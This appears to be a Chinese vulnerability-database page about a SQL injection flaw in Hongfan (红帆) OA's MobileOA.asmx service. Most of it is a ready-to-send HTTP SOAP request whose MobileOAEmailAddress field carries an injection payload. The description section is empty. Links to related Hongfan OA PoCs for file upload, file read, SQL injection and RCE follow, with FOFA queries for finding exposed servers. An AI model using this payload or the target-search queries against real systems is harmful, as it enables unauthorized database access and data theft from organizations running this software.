红帆OA MobileOAEmailAddress SQL注入漏洞

漏洞描述

PoC代码

POST /iOffice/prg/set/wss/MobileOA.asmx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Type: text/xml; charset=utf-8

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
               xmlns:xsd="http://www.w3.org/2001/XMLSchema"
               xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GeMrNewData xmlns="http://tempuri.org/">
      <MobileOAEmailAddress>' AND 5079 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5079=5079) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(98)+CHAR(113)))-- eqJq</MobileOAEmailAddress>
    </GeMrNewData>
  </soap:Body>
</soap:Envelope>

相关漏洞推荐

• hongfan-oa-iorepsavexml-file-upload: 红帆OA iorepsavexml.aspx 任意文件上传 POC

  2025-09-01 | 红帆OA
  FOFA: app="红帆-ioffice"

• ioffice-oa-iofileexport-read-file: 红帆OA ioFileExport.aspx 任意文件读取漏洞 POC

  2025-09-01 | 红帆OA
  红帆OA ioFileExport.aspx文件存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器敏感信息 FOFA: app="红帆-ioffice" ZoomEye: app:...

• ioffice-oa-udfmr-asmx-sql-inject: 红帆OA udfmr.asmx SQL注入漏洞 POC

  2025-09-01 | 红帆OA
  红帆iOffice.net udfmr.asmx处存在SQL注入漏洞，攻击者可以从其中获取数据库权限。 fofa：app="红帆-ioffice"

• hongfan-oa-ioassistance-rce: 红帆OA ioAssistance.asmx 注入RCE POC

  2025-09-01 | hongfan-oa-ioassistance-rce
  FOFA: app="红帆-ioffice"

• LemonLDAP::NG 操作系统命令注入漏洞 无POC

  2025-09-20 00:03:21 | LemonLDAP::NG
  LemonLDAP::NG是LemonLDAP::NG开源的一套Web单点登录和访问管理软件。 LemonLDAP::NG 2.16.7之前版本和2.17版本至2.21.3之前版本存在操作系统命令注入...